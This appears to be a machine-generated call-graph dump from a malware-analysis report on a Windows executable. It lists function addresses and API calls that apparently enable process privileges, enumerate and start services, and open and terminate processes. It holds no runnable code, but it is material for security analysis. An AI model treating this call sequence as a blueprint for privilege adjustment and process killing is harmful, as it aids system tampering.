API calls 21836->21842 21849 443965 21838->21849 21844 4438b5 21839->21844 21845 404cdc 14 API calls 21840->21845 21846 4439d2 21841->21846 21847 443850 21842->21847 21843 443a16 21848 404564 17 API calls 21843->21848 21850 407450 15 API calls 21844->21850 21852 443a07 21845->21852 21853 407450 15 API calls 21846->21853 21847->21792 21858 404564 17 API calls 21847->21858 21854 443a23 21848->21854 21851 4438c1 21850->21851 21855 404cdc 14 API calls 21851->21855 21856 4042f8 14 API calls 21852->21856 21857 4439de 21853->21857 21859 4072a4 15 API calls 21854->21859 21860 4438c6 21855->21860 21856->21849 21861 404cdc 14 API calls 21857->21861 21862 443863 21858->21862 21863 443a30 21859->21863 21864 4042f8 14 API calls 21860->21864 21865 4439e3 21861->21865 21866 4072a4 15 API calls 21862->21866 21867 443cc4 21863->21867 21872 443a5f 21863->21872 21873 407450 15 API calls 21863->21873 21868 4438cb 21864->21868 21870 4042f8 14 API calls 21865->21870 21871 443870 21866->21871 21869 404564 17 API calls 21867->21869 21874 407450 15 API calls 21868->21874 21875 443cd1 21869->21875 21870->21849 21871->21782 21871->21792 21876 407450 15 API calls 21872->21876 21877 443a4b 21873->21877 21878 4438d7 21874->21878 21879 4072a4 15 API calls 21875->21879 21880 443a6b 21876->21880 21881 404cdc 14 API calls 21877->21881 21882 404cdc 14 API calls 21878->21882 21883 443cde 21879->21883 21884 404cdc 14 API calls 21880->21884 21885 443a50 21881->21885 21886 4438dc 21882->21886 21887 443e6b 21883->21887 21892 443d0d 21883->21892 21898 407450 15 API calls 21883->21898 21888 443a70 21884->21888 21890 4042f8 14 API calls 21885->21890 21891 4042f8 14 API calls 21886->21891 21889 404564 17 API calls 21887->21889 21893 4042f8 14 API calls 21888->21893 21894 443e78 21889->21894 21896 443a55 21890->21896 21897 4438e1 21891->21897 21895 407450 15 API calls 21892->21895 21899 443a75 21893->21899 21900 4072a4 15 API calls 21894->21900 21901 443d19 21895->21901 22942 40632c 10 API calls 21896->22942 21903 407450 15 API calls 21897->21903 21904 443cf9 21898->21904 21905 407450 15 API calls 21899->21905 21906 443e85 21900->21906 21907 404cdc 14 API calls 21901->21907 21908 4438ed 21903->21908 21909 404cdc 14 API calls 21904->21909 21910 443a81 21905->21910 21912 443ecb 21906->21912 21918 443eb0 21906->21918 21919 443e90 21906->21919 21913 443d1e 21907->21913 21914 404cdc 14 API calls 21908->21914 21915 443cfe 21909->21915 21911 404cdc 14 API calls 21910->21911 21917 443a86 21911->21917 21921 404564 17 API calls 21912->21921 21920 4042f8 14 API calls 21913->21920 21922 4438f2 21914->21922 21916 4042f8 14 API calls 21915->21916 21923 443d03 21916->21923 21925 4042f8 14 API calls 21917->21925 21924 407450 15 API calls 21918->21924 21926 407450 15 API calls 21919->21926 21927 443d23 21920->21927 21928 443ed8 21921->21928 21929 4042f8 14 API calls 21922->21929 22944 40632c 10 API calls 21923->22944 21932 443ebc 21924->21932 21933 443a8b 21925->21933 21934 443e9c 21926->21934 21935 443d31 21927->21935 21936 443d2c 21927->21936 21937 4072a4 15 API calls 21928->21937 21930 4438f7 21929->21930 21938 407450 15 API calls 21930->21938 21939 404cdc 14 API calls 21932->21939 21940 407450 15 API calls 21933->21940 21941 404cdc 14 API calls 21934->21941 21944 43b7d4 52 API calls 21935->21944 21942 43a688 18 API calls 21936->21942 21943 443ee5 21937->21943 21945 443903 21938->21945 21946 443ec1 21939->21946 21947 443a97 21940->21947 21948 443ea1 21941->21948 21942->21935 21943->21849 21949 443eeb 21943->21949 21950 443d36 21944->21950 21951 404cdc 14 API calls 21945->21951 21952 4042f8 14 API calls 21946->21952 21953 404cdc 14 API calls 21947->21953 21954 4042f8 14 API calls 21948->21954 21955 407450 15 API calls 21949->21955 21956 407450 15 API calls 21950->21956 21958 443908 21951->21958 21959 443ec6 21952->21959 21960 443a9c 21953->21960 21961 443ea6 21954->21961 21962 443ef7 21955->21962 21957 443d42 21956->21957 21964 404cdc 14 API calls 21957->21964 21965 4042f8 14 API calls 21958->21965 22949 43f7a4 129 API calls 21959->22949 21967 4042f8 14 API calls 21960->21967 22948 40632c 10 API calls 21961->22948 21963 404cdc 14 API calls 21962->21963 21969 443efc 21963->21969 21970 443d47 21964->21970 21971 44390d 21965->21971 21972 443aa1 21967->21972 21973 4042f8 14 API calls 21969->21973 21974 4042f8 14 API calls 21970->21974 21975 407450 15 API calls 21971->21975 21976 407450 15 API calls 21972->21976 21977 443f01 21973->21977 21978 443d4c 21974->21978 21979 443919 21975->21979 21980 443aad 21976->21980 21981 43b7d4 52 API calls 21977->21981 22945 43c9b4 77 API calls 21978->22945 21983 404cdc 14 API calls 21979->21983 21984 404cdc 14 API calls 21980->21984 21985 443f06 21981->21985 21987 44391e 21983->21987 21988 443ab2 21984->21988 21989 407450 15 API calls 21985->21989 21986 443d51 21990 407450 15 API calls 21986->21990 21991 4042f8 14 API calls 21987->21991 21992 4042f8 14 API calls 21988->21992 21993 443f12 21989->21993 21994 443d5d 21990->21994 21995 443923 21991->21995 21996 443ab7 21992->21996 21998 404cdc 14 API calls 21993->21998 21999 404cdc 14 API calls 21994->21999 22000 407450 15 API calls 21995->22000 21997 407450 15 API calls 21996->21997 22001 443ac3 21997->22001 22002 443f17 21998->22002 22003 443d62 21999->22003 22004 44392f 22000->22004 22005 404cdc 14 API calls 22001->22005 22006 4042f8 14 API calls 22002->22006 22007 4042f8 14 API calls 22003->22007 22008 404cdc 14 API calls 22004->22008 22010 443ac8 22005->22010 22011 443f1c 22006->22011 22012 443d67 22007->22012 22009 443934 22008->22009 22013 4042f8 14 API calls 22009->22013 22014 4042f8 14 API calls 22010->22014 22015 43bf00 23 API calls 22011->22015 22016 43bf00 23 API calls 22012->22016 22017 443939 22013->22017 22018 443acd 22014->22018 22019 443f26 22015->22019 22020 443d71 22016->22020 22021 407450 15 API calls 22017->22021 22022 407450 15 API calls 22018->22022 22023 43c1c8 21 API calls 22019->22023 22024 43c1c8 21 API calls 22020->22024 22026 443945 22021->22026 22027 443ad9 22022->22027 22028 443f30 Sleep 22023->22028 22025 443d7b Sleep 22024->22025 22029 407450 15 API calls 22025->22029 22030 404cdc 14 API calls 22026->22030 22031 404cdc 14 API calls 22027->22031 22051 443f44 22028->22051 22032 443d91 22029->22032 22033 44394a 22030->22033 22034 443ade 22031->22034 22036 404cdc 14 API calls 22032->22036 22037 4042f8 14 API calls 22033->22037 22038 4042f8 14 API calls 22034->22038 22035 443f6d Sleep 22041 43b58c 27 API calls 22035->22041 22039 443d96 22036->22039 22040 44394f 22037->22040 22042 443ae3 22038->22042 22043 4042f8 14 API calls 22039->22043 22044 407450 15 API calls 22040->22044 22045 443f81 22041->22045 22046 407450 15 API calls 22042->22046 22047 443d9b 22043->22047 22048 44395b 22044->22048 22049 407450 15 API calls 22045->22049 22050 443aef 22046->22050 22946 43d938 24 API calls 22047->22946 22053 404cdc 14 API calls 22048->22053 22054 443f8d 22049->22054 22055 404cdc 14 API calls 22050->22055 22051->22035 22056 43b58c 27 API calls 22051->22056 22057 443960 22053->22057 22058 404cdc 14 API calls 22054->22058 22059 443af4 22055->22059 22056->22051 22061 4042f8 14 API calls 22057->22061 22062 443f92 22058->22062 22060 4042f8 14 API calls 22059->22060 22064 443af9 22060->22064 22061->21849 22063 4042f8 14 API calls 22062->22063 22063->21849 22065 404564 17 API calls 22064->22065 22067 443b06 22065->22067 22066 443dd3 Sleep 22068 43b58c 27 API calls 22066->22068 22069 4072a4 15 API calls 22067->22069 22070 443de7 Sleep 22068->22070 22071 443b13 22069->22071 22072 404564 17 API calls 22070->22072 22074 443b15 22071->22074 22075 443b26 22071->22075 22076 443dfe 22072->22076 22073 443da0 22073->22066 22077 43b58c 27 API calls 22073->22077 22078 406bf0 15 API calls 22074->22078 22080 406bf0 15 API calls 22075->22080 22079 4072a4 15 API calls 22076->22079 22077->22073 22081 443b24 22078->22081 22082 443e0b 22079->22082 22080->22081 22084 443b43 22081->22084 22329 43a688 GetModuleHandleW 22081->22329 22083 443e47 22082->22083 22086 407450 15 API calls 22082->22086 22085 443e55 22083->22085 22947 43a724 18 API calls 22083->22947 22334 43de78 22084->22334 22092 407450 15 API calls 22085->22092 22091 443e19 22086->22091 22089 443b48 22433 43b7d4 22089->22433 22094 404cdc 14 API calls 22091->22094 22095 443e61 22092->22095 22097 443e1e 22094->22097 22098 404cdc 14 API calls 22095->22098 22101 4042f8 14 API calls 22097->22101 22099 443e66 22098->22099 22102 4042f8 14 API calls 22099->22102 22100 407450 15 API calls 22103 443b59 22100->22103 22104 443e23 22101->22104 22102->21887 22106 404cdc 14 API calls 22103->22106 22105 43e864 85 API calls 22104->22105 22107 443e2a 22105->22107 22108 443b5e 22106->22108 22109 407450 15 API calls 22107->22109 22110 4042f8 14 API calls 22108->22110 22111 443e36 22109->22111 22112 443b63 22110->22112 22113 404cdc 14 API calls 22111->22113 22114 404564 17 API calls 22112->22114 22115 443e3b 22113->22115 22116 443b70 22114->22116 22117 4042f8 14 API calls 22115->22117 22118 4072a4 15 API calls 22116->22118 22119 443e40 22117->22119 22120 443b7d 22118->22120 22121 43f310 21 API calls 22119->22121 22122 443b99 22120->22122 22123 404564 17 API calls 22120->22123 22121->22083 22502 43d0f8 22122->22502 22125 443b8c 22123->22125 22126 4072a4 15 API calls 22125->22126 22126->22122 22127 443bab 22128 407450 15 API calls 22127->22128 22129 443bb7 22128->22129 22130 404cdc 14 API calls 22129->22130 22131 443bbc 22130->22131 22132 4042f8 14 API calls 22131->22132 22133 443bc1 22132->22133 22652 43c598 22133->22652 22135 443bc6 22136 407450 15 API calls 22135->22136 22137 443bd2 22136->22137 22138 404cdc 14 API calls 22137->22138 22139 443bd7 22138->22139 22140 4042f8 14 API calls 22139->22140 22141 443bdc 22140->22141 22685 43e7dc 22141->22685 22144 407450 15 API calls 22145 443bed 22144->22145 22146 404cdc 14 API calls 22145->22146 22147 443bf2 22146->22147 22148 4042f8 14 API calls 22147->22148 22149 443bf7 22148->22149 22694 43bf00 22149->22694 22151 443c01 22731 43c1c8 OpenProcess 22151->22731 22153 443c0b Sleep 22158 443c1f 22153->22158 22154 443c48 Sleep 22758 43b58c 22154->22758 22156 443c5c Sleep 22157 407450 15 API calls 22156->22157 22159 443c72 22157->22159 22158->22154 22160 43b58c 27 API calls 22158->22160 22161 404cdc 14 API calls 22159->22161 22160->22158 22162 443c77 22161->22162 22163 4042f8 14 API calls 22162->22163 22164 443c7c 22163->22164 22786 43e864 22164->22786 22166 443c83 22167 407450 15 API calls 22166->22167 22168 443c8f 22167->22168 22169 404cdc 14 API calls 22168->22169 22170 443c94 22169->22170 22171 4042f8 14 API calls 22170->22171 22172 443c99 22171->22172 22931 43f310 22172->22931 22174 443ca0 22175 407450 15 API calls 22174->22175 22176 443cac 22175->22176 22177 404cdc 14 API calls 22176->22177 22178 443cb1 22177->22178 22179 4042f8 14 API calls 22178->22179 22180 443cb6 22179->22180 22180->21867 22181 443cbf 22180->22181 22943 43a724 18 API calls 22181->22943 22184 40a2eb 22183->22184 22950 405f98 22184->22950 22187 407450 22188 407473 22187->22188 22995 406824 22188->22995 22193 404cdc 22194 404d02 22193->22194 22195 404ce7 22193->22195 22197 404be8 14 API calls 22194->22197 22196 404be8 14 API calls 22195->22196 22198 404cfe 22196->22198 22197->22198 23038 404930 22198->23038 22201 4042f8 23048 40a264 14 API calls 22201->23048 22203 40430c 22203->21761 22204 4042a0 22204->22203 22205 4042c5 22204->22205 23046 40a264 14 API calls 22204->23046 23047 404294 10 API calls 22205->23047 22208 4042e6 22208->21761 23049 404448 22209->23049 22211 404448 15 API calls 22212 404528 22211->22212 22212->22211 22213 40453f 22212->22213 22213->21781 22215 406bf0 15 API calls 22214->22215 22216 40457a 22215->22216 22217 40459c GetCommandLineW 22216->22217 22218 40457e GetModuleFileNameW 22216->22218 22223 4045a3 22217->22223 23053 406d2c 22218->23053 22221 404448 15 API calls 22221->22223 22222 4045ba 22224 4072a4 22222->22224 22223->22221 22223->22222 22225 4072a8 22224->22225 22228 4072b8 22224->22228 22225->22228 23058 406d1c 15 API calls 22225->23058 22227 4072f2 22229 4072a4 15 API calls 22227->22229 22228->21790 22230 4072fb 22229->22230 23059 4041cc 14 API calls 22230->23059 22232 407306 22232->21790 22234 43a657 22233->22234 22234->21828 22234->21829 22236 43a7e1 22235->22236 22237 43a7f6 22235->22237 23121 4387ec 18 API calls 22236->23121 23122 4387a8 18 API calls 22237->23122 22240 43a7f2 23060 438890 22240->23060 22244 43a81c 22245 43a863 22244->22245 22248 43a827 GetLastError 22244->22248 23093 439408 22245->23093 22250 407450 15 API calls 22248->22250 22252 43a843 22250->22252 23123 407dec 22252->23123 22256 407450 15 API calls 22257 43a852 22256->22257 22260 404cdc 14 API calls 22257->22260 22258 43a906 22262 438b0c 20 API calls 22258->22262 22259 43a884 22259->22258 22263 40e50c 15 API calls 22259->22263 22261 43a857 22260->22261 22264 4042f8 14 API calls 22261->22264 22265 43a912 22262->22265 22270 43a8a0 22263->22270 22266 43a85c 22264->22266 22267 43a959 22265->22267 22272 43a91d GetLastError 22265->22272 23127 40632c 10 API calls 22266->23127 22269 439408 71 API calls 22267->22269 22271 43a968 22269->22271 22270->22258 22277 407450 15 API calls 22270->22277 22273 406bf0 15 API calls 22271->22273 22274 407450 15 API calls 22272->22274 22275 43a975 22273->22275 22276 43a939 22274->22276 22278 438860 17 API calls 22275->22278 22279 407dec 14 API calls 22276->22279 22280 43a8c7 22277->22280 22281 43a97c 22278->22281 22282 43a93e 22279->22282 22284 404cdc 14 API calls 22280->22284 22285 40e50c 15 API calls 22281->22285 22283 407450 15 API calls 22282->22283 22286 43a948 22283->22286 22287 43a8cc 22284->22287 22293 43a989 22285->22293 22288 404cdc 14 API calls 22286->22288 22289 4042f8 14 API calls 22287->22289 22290 43a94d 22288->22290 22291 43a8d1 22289->22291 22294 4042f8 14 API calls 22290->22294 22295 407450 15 API calls 22291->22295 22292 43aa10 22301 40e50c 15 API calls 22292->22301 22293->22292 22296 40e50c 15 API calls 22293->22296 22297 43a952 22294->22297 22298 43a8e0 22295->22298 22305 43a9a7 22296->22305 23129 40632c 10 API calls 22297->23129 22300 407450 15 API calls 22298->22300 22302 43a8e8 22300->22302 22307 43aa24 22301->22307 22303 407450 15 API calls 22302->22303 22304 43a8f2 22303->22304 22306 404cdc 14 API calls 22304->22306 22305->22292 22310 407450 15 API calls 22305->22310 22308 43a8f7 22306->22308 22307->21843 22309 4042f8 14 API calls 22308->22309 22311 43a8fc 22309->22311 22312 43a9ce 22310->22312 23128 40632c 10 API calls 22311->23128 22314 404cdc 14 API calls 22312->22314 22315 43a9d3 22314->22315 22316 4042f8 14 API calls 22315->22316 22317 43a9d8 22316->22317 22318 407450 15 API calls 22317->22318 22319 43a9e7 22318->22319 22320 407450 15 API calls 22319->22320 22321 43a9f2 22320->22321 22322 407450 15 API calls 22321->22322 22323 43a9fc 22322->22323 22324 404cdc 14 API calls 22323->22324 22325 43aa01 22324->22325 22326 4042f8 14 API calls 22325->22326 22327 43aa06 22326->22327 23130 40632c 10 API calls 22327->23130 22330 43a6bf 22329->22330 22331 43a69e 22329->22331 22330->22084 23172 40aa94 17 API calls 22331->23172 22333 43a6a9 22333->22330 23173 43c45c 22334->23173 22336 43deae 23183 43dc64 22336->23183 22341 407450 15 API calls 22342 43df08 22341->22342 22343 407450 15 API calls 22342->22343 22344 43df10 22343->22344 22345 404cdc 14 API calls 22344->22345 22346 43df15 22345->22346 22347 4042f8 14 API calls 22346->22347 22348 43df1a 22347->22348 22349 43dfaa 22348->22349 22350 43df2b 22348->22350 22351 43dfb7 22349->22351 22367 43e004 22349->22367 22353 43df7f 22350->22353 22355 407450 15 API calls 22350->22355 22354 43dfd9 22351->22354 22356 407450 15 API calls 22351->22356 22352 43e060 22357 43cea4 73 API calls 22352->22357 22359 407450 15 API calls 22353->22359 22365 43dfa5 22353->22365 22363 407450 15 API calls 22354->22363 22354->22365 22358 43df43 22355->22358 22360 43dfcf 22356->22360 22361 43e07c 22357->22361 22362 404cdc 14 API calls 22358->22362 22364 43df9b 22359->22364 22366 404cdc 14 API calls 22360->22366 23193 407184 15 API calls 22361->23193 22369 43df48 22362->22369 22370 43dff5 22363->22370 22371 404cdc 14 API calls 22364->22371 22365->22089 22372 43dfd4 22366->22372 22367->22352 22373 407450 15 API calls 22367->22373 22374 4042f8 14 API calls 22369->22374 22375 404cdc 14 API calls 22370->22375 22376 43dfa0 22371->22376 22377 4042f8 14 API calls 22372->22377 22378 43e03d 22373->22378 22379 43df4d 22374->22379 22380 43dffa 22375->22380 22381 4042f8 14 API calls 22376->22381 22377->22354 22382 404cdc 14 API calls 22378->22382 22383 407450 15 API calls 22379->22383 22384 4042f8 14 API calls 22380->22384 22381->22365 22385 43e042 22382->22385 22387 43df5c 22383->22387 22384->22365 22388 4042f8 14 API calls 22385->22388 22391 404cdc 14 API calls 22387->22391 22393 43e047 22388->22393 22396 43df61 22391->22396 22399 407450 15 API calls 22393->22399 22400 4042f8 14 API calls 22396->22400 22405 43e056 22399->22405 22401 43df66 22400->22401 22406 407450 15 API calls 22401->22406 22410 404cdc 14 API calls 22405->22410 22411 43df75 22406->22411 22415 43e05b 22410->22415 22416 404cdc 14 API calls 22411->22416 22420 4042f8 14 API calls 22415->22420 22421 43df7a 22416->22421 22420->22352 22425 4042f8 14 API calls 22421->22425 22425->22353 22438 43b7dc 22433->22438 22434 43b7f8 OpenSCManagerW 22435 43b80c GetLastError 22434->22435 22434->22438 22437 407450 15 API calls 22435->22437 22437->22438 22438->22434 22439 404cdc 14 API calls 22438->22439 22440 43b893 EnumServicesStatusExW 22438->22440 22442 43b99e CloseServiceHandle 22438->22442 22446 407dec 14 API calls 22438->22446 22447 43ba9f 22438->22447 22448 407450 15 API calls 22438->22448 22455 43b58c 27 API calls 22438->22455 22458 40e50c 15 API calls 22438->22458 22461 4042f8 14 API calls 22438->22461 22463 40632c 10 API calls 22438->22463 22465 4072a4 15 API calls 22438->22465 23217 408334 22438->23217 23220 43b1a8 22438->23220 22439->22438 22441 43b8af GetLastError 22440->22441 22440->22442 22443 43b8be CloseServiceHandle 22441->22443 22450 43b8fe 22441->22450 22442->22438 22445 407450 15 API calls 22443->22445 22444 408334 20 API calls 22444->22450 22445->22438 22446->22438 22449 407450 15 API calls 22447->22449 22448->22438 22452 43bab7 22449->22452 22450->22444 22454 43b944 EnumServicesStatusExW 22450->22454 22453 407dec 14 API calls 22452->22453 22456 43babc 22453->22456 22454->22442 22457 43b95c CloseServiceHandle GetLastError 22454->22457 22455->22438 22459 407450 15 API calls 22456->22459 22462 407450 15 API calls 22457->22462 22458->22438 22460 43bac6 22459->22460 22464 404cdc 14 API calls 22460->22464 22461->22438 22475 43b97e 22462->22475 22463->22438 22466 43bacb 22464->22466 22465->22438 22468 4042f8 14 API calls 22466->22468 22467 407dec 14 API calls 22467->22475 22469 43bad0 22468->22469 22471 408334 20 API calls 22469->22471 22470 407450 15 API calls 22470->22475 22496 43bae7 22471->22496 22472 404cdc 14 API calls 22472->22475 22473 4042f8 14 API calls 22473->22475 22474 43bb80 22476 406bf0 15 API calls 22474->22476 22475->22467 22475->22470 22475->22472 22475->22473 23274 40632c 10 API calls 22475->23274 22488 43bb8c 22476->22488 22478 43bbe4 22479 43bc13 22478->22479 22480 43bbed 22478->22480 22482 407450 15 API calls 22479->22482 22483 407450 15 API calls 22480->22483 22481 4072a4 15 API calls 22481->22496 22485 43bc22 22482->22485 22487 43bbfc 22483->22487 22484 406bf0 15 API calls 22484->22488 22489 404cdc 14 API calls 22485->22489 22490 407450 15 API calls 22487->22490 22488->22478 22488->22484 23275 407184 15 API calls 22488->23275 22491 43bc27 22489->22491 22492 43bc07 22490->22492 22494 4042f8 14 API calls 22491->22494 22495 404cdc 14 API calls 22492->22495 22493 408334 20 API calls 22493->22496 22499 43bc11 22494->22499 22497 43bc0c 22495->22497 22496->22474 22496->22481 22496->22493 22498 4042f8 14 API calls 22497->22498 22498->22499 23268 408340 22499->23268 22503 43d100 22502->22503 22503->22503 22504 43c45c 17 API calls 22503->22504 22505 43d124 22504->22505 23331 40f9d8 22505->23331 22510 43c45c 17 API calls 22514 43d14c 22510->22514 22511 43d2c1 22513 43d36a 22511->22513 22516 404564 17 API calls 22511->22516 22512 43d208 22515 407450 15 API calls 22512->22515 22518 406c44 14 API calls 22513->22518 22517 40f9d8 15 API calls 22514->22517 22519 43d217 22515->22519 22521 43d2d8 22516->22521 22522 43d157 22517->22522 22523 43d3af 22518->22523 22520 404cdc 14 API calls 22519->22520 22525 43d21c 22520->22525 22526 40f9d8 15 API calls 22521->22526 23340 40f7e8 22522->23340 22524 406c44 14 API calls 22523->22524 22528 43d3b9 22524->22528 22529 4042f8 14 API calls 22525->22529 22530 43d2e3 22526->22530 22532 43d3d1 22528->22532 22533 43d3c4 22528->22533 22534 43d221 22529->22534 23364 4070a0 22530->23364 22531 43d15f 22536 43d163 22531->22536 22537 43d1a0 22531->22537 22538 43c45c 17 API calls 22532->22538 22542 43c45c 17 API calls 22533->22542 22606 43d3cc 22533->22606 23414 43cf60 21 API calls 22534->23414 22541 43c45c 17 API calls 22536->22541 22539 407450 15 API calls 22537->22539 22543 43d3de 22538->22543 22544 43d1af 22539->22544 22540 43d2f3 23385 40f77c 22540->23385 22546 43d170 22541->22546 22549 43d465 22542->22549 22550 43cc44 81 API calls 22543->22550 22551 404cdc 14 API calls 22544->22551 22553 40f9d8 15 API calls 22546->22553 22547 43d50c 22554 43d543 22547->22554 22563 43c45c 17 API calls 22547->22563 22557 43cc44 81 API calls 22549->22557 22558 43d3eb 22550->22558 22559 43d1b4 22551->22559 22552 43d2fb 22560 43d373 22552->22560 22593 43d2ff 22552->22593 22561 43d17b 22553->22561 22554->22127 22555 43c45c 17 API calls 22565 43d4e8 22555->22565 22556 43d237 22566 43d23b 22556->22566 22567 43d29a 22556->22567 22568 43d472 22557->22568 22569 43d40c 22558->22569 22585 406c44 14 API calls 22558->22585 22570 4042f8 14 API calls 22559->22570 22564 43c45c 17 API calls 22560->22564 22562 407450 15 API calls 22561->22562 22571 43d18e 22562->22571 22572 43d51f 22563->22572 22573 43d380 22564->22573 22574 40f77c 4 API calls 22565->22574 22590 43c45c 17 API calls 22566->22590 22576 407450 15 API calls 22567->22576 22575 43d493 22568->22575 22591 406c44 14 API calls 22568->22591 22577 43d42d 22569->22577 22595 406c44 14 API calls 22569->22595 22578 43d1b9 22570->22578 22579 407450 15 API calls 22571->22579 22580 40f77c 4 API calls 22572->22580 22581 40f9d8 15 API calls 22573->22581 22584 43d4f0 22574->22584 22582 43d4b4 22575->22582 22600 406c44 14 API calls 22575->22600 22586 43d2a9 22576->22586 22596 406c44 14 API calls 22577->22596 22577->22606 22583 43c45c 17 API calls 22578->22583 22587 43d194 22579->22587 22588 43d527 22580->22588 22589 43d38b 22581->22589 22582->22606 22612 406c44 14 API calls 22582->22612 22592 43d1c6 22583->22592 22584->22547 22603 43c45c 17 API calls 22584->22603 22585->22569 22594 404cdc 14 API calls 22586->22594 22597 404cdc 14 API calls 22587->22597 22588->22554 22608 43c45c 17 API calls 22588->22608 22598 406fe0 15 API calls 22589->22598 22599 43d252 22590->22599 22591->22575 22601 40f9d8 15 API calls 22592->22601 22602 43c45c 17 API calls 22593->22602 22604 43d2ae 22594->22604 22595->22577 22596->22606 22607 43d199 22597->22607 22609 43d398 22598->22609 22610 40f9d8 15 API calls 22599->22610 22600->22582 22611 43d1d1 22601->22611 22613 43d324 22602->22613 22614 43d501 22603->22614 22605 4042f8 14 API calls 22604->22605 22615 43d298 22605->22615 22606->22547 22606->22555 22616 4042f8 14 API calls 22607->22616 22617 43d538 22608->22617 23395 43cc44 22609->23395 22619 43d25d 22610->22619 22620 407450 15 API calls 22611->22620 22612->22606 22621 40f9d8 15 API calls 22613->22621 22622 43cc44 81 API calls 22614->22622 22615->22511 22623 43d19e 22616->22623 22624 43cc44 81 API calls 22617->22624 22625 4070a0 15 API calls 22619->22625 22626 43d1e4 22620->22626 22627 43d32f 22621->22627 22622->22547 22623->22511 22623->22512 22624->22554 22628 43d26d 22625->22628 22629 407450 15 API calls 22626->22629 22630 4070a0 15 API calls 22627->22630 22634 407450 15 API calls 22628->22634 22631 43d1ea 22629->22631 22632 43d33f 22630->22632 22633 404cdc 14 API calls 22631->22633 22638 407450 15 API calls 22632->22638 22635 43d1ef 22633->22635 22636 43d286 22634->22636 22637 4042f8 14 API calls 22635->22637 22639 407450 15 API calls 22636->22639 22640 43d1f4 22637->22640 22641 43d358 22638->22641 22642 43d28e 22639->22642 23413 40632c 10 API calls 22640->23413 22644 407450 15 API calls 22641->22644 22645 404cdc 14 API calls 22642->22645 22646 43d360 22644->22646 22647 43d293 22645->22647 22648 404cdc 14 API calls 22646->22648 22650 4042f8 14 API calls 22647->22650 22649 43d365 22648->22649 22651 4042f8 14 API calls 22649->22651 22650->22615 22651->22513 22653 43c5d1 22652->22653 22654 43c5bb 22652->22654 23549 4387a8 18 API calls 22653->23549 23548 4387ec 18 API calls 22654->23548 22657 43c5cc 22658 438890 18 API calls 22657->22658 22659 43c5ed 22658->22659 23526 4389d8 22659->23526 22661 43c5fc 22662 43c600 GetLastError 22661->22662 22663 43c63c 22661->22663 22664 407450 15 API calls 22662->22664 23542 43937c 22663->23542 22666 43c61c 22664->22666 22667 407dec 14 API calls 22666->22667 22669 43c621 22667->22669 22668 43c6b4 22672 438860 17 API calls 22668->22672 22671 407450 15 API calls 22669->22671 22670 43c65d 22670->22668 22673 43c45c 17 API calls 22670->22673 22674 43c62b 22671->22674 22681 43c6f3 22672->22681 22675 43c68c 22673->22675 22676 404cdc 14 API calls 22674->22676 23551 407184 15 API calls 22675->23551 22678 43c630 22676->22678 22680 4042f8 14 API calls 22678->22680 22683 43c635 22680->22683 22681->22135 23550 40632c 10 API calls 22683->23550 23566 43ae28 22685->23566 22687 43e7e6 22688 43e7fa 22687->22688 22689 43b1a8 26 API calls 22687->22689 22690 43ae28 27 API calls 22688->22690 22689->22688 22691 43e804 22690->22691 22692 43e818 22691->22692 22693 43b1a8 26 API calls 22691->22693 22692->22144 22693->22692 22695 406bd8 22694->22695 22696 43bf27 GetCurrentProcess OpenProcessToken 22695->22696 22697 43bf97 22696->22697 22698 43bf4c GetLastError 22696->22698 22701 43bfa3 LookupPrivilegeValueW 22697->22701 23629 40f220 15 API calls 22698->23629 22700 43bf66 23630 407184 15 API calls 22700->23630 22703 43bffa AdjustTokenPrivileges 22701->22703 22704 43bfaf GetLastError 22701->22704 22707 43c031 GetLastError 22703->22707 22716 43bf92 22703->22716 23631 40f220 15 API calls 22704->23631 23633 40f220 15 API calls 22707->23633 22708 43bfc9 23632 407184 15 API calls 22708->23632 22713 43c04b 23634 407184 15 API calls 22713->23634 22716->22151 22732 43c216 TerminateProcess 22731->22732 22733 43c1da GetLastError 22731->22733 22734 43c222 CloseHandle GetLastError 22732->22734 22735 43c264 CloseHandle 22732->22735 22736 407450 15 API calls 22733->22736 22737 407450 15 API calls 22734->22737 22735->22153 22738 43c1f6 22736->22738 22739 43c244 22737->22739 22740 407dec 14 API calls 22738->22740 22741 407dec 14 API calls 22739->22741 22742 43c1fb 22740->22742 22744 43c249 22741->22744 22743 407450 15 API calls 22742->22743 22745 43c205 22743->22745 22746 407450 15 API calls 22744->22746 22747 404cdc 14 API calls 22745->22747 22748 43c253 22746->22748 22749 43c20a 22747->22749 22750 404cdc 14 API calls 22748->22750 22752 4042f8 14 API calls 22749->22752 22751 43c258 22750->22751 22753 4042f8 14 API calls 22751->22753 22754 43c20f 22752->22754 22755 43c25d 22753->22755 23635 40632c 10 API calls 22754->23635 23636 40632c 10 API calls 22755->23636 22759 43b59e 22758->22759 22760 407450 15 API calls 22759->22760 22761 43b5c5 22760->22761 22762 407450 15 API calls 22761->22762 22763 43b5cd 22762->22763 22764 407450 15 API calls 22763->22764 22765 43b5d7 22764->22765 22766 404cdc 14 API calls 22765->22766 22767 43b5dc 22766->22767 22768 4042f8 14 API calls 22767->22768 22769 43b5e1 OpenSCManagerW 22768->22769 22770 43b5f8 GetLastError 22769->22770 22772 43b610 22769->22772 23637 43b48c 17 API calls 22770->23637 22773 43b61a OpenServiceW 22772->22773 22774 43b642 StartServiceW 22773->22774 22775 43b62d GetLastError 22773->22775 22777 43b6a6 CloseServiceHandle CloseServiceHandle 22774->22777 22778 43b65a GetLastError 22774->22778 23638 43b48c 17 API calls 22775->23638 22779 43b60a 22777->22779 22781 43b696 22778->22781 22782 43b669 Sleep StartServiceW 22778->22782 22779->22156 22780 43b63f 22780->22779 23640 43b48c 17 API calls 22781->23640 22782->22777 22783 43b686 22782->22783 23639 43b48c 17 API calls 22783->23639 22787 43e879 22786->22787 22788 43e88f 22786->22788 23649 4387ec 18 API calls 22787->23649 23650 4387a8 18 API calls 22788->23650 22791 43e88a 22792 438890 18 API calls 22791->22792 22793 43e8ab 22792->22793 22794 4389d8 19 API calls 22793->22794 22795 43e8ba 22794->22795 22796 43e8fa 22795->22796 22797 43e8be GetLastError 22795->22797 23641 4396b8 22796->23641 22799 407450 15 API calls 22797->22799 22801 43e8da 22799->22801 22802 407dec 14 API calls 22801->22802 22804 43e8df 22802->22804 22803 438860 17 API calls 22805 43e95b 22803->22805 22806 407450 15 API calls 22804->22806 22808 43ed53 22805->22808 22809 4389d8 19 API calls 22805->22809 22807 43e8e9 22806->22807 22810 404cdc 14 API calls 22807->22810 22808->22166 22811 43e974 22809->22811 22812 43e8ee 22810->22812 22813 43e9b4 22811->22813 22814 43e978 GetLastError 22811->22814 22815 4042f8 14 API calls 22812->22815 22816 4396b8 70 API calls 22813->22816 22817 407450 15 API calls 22814->22817 22818 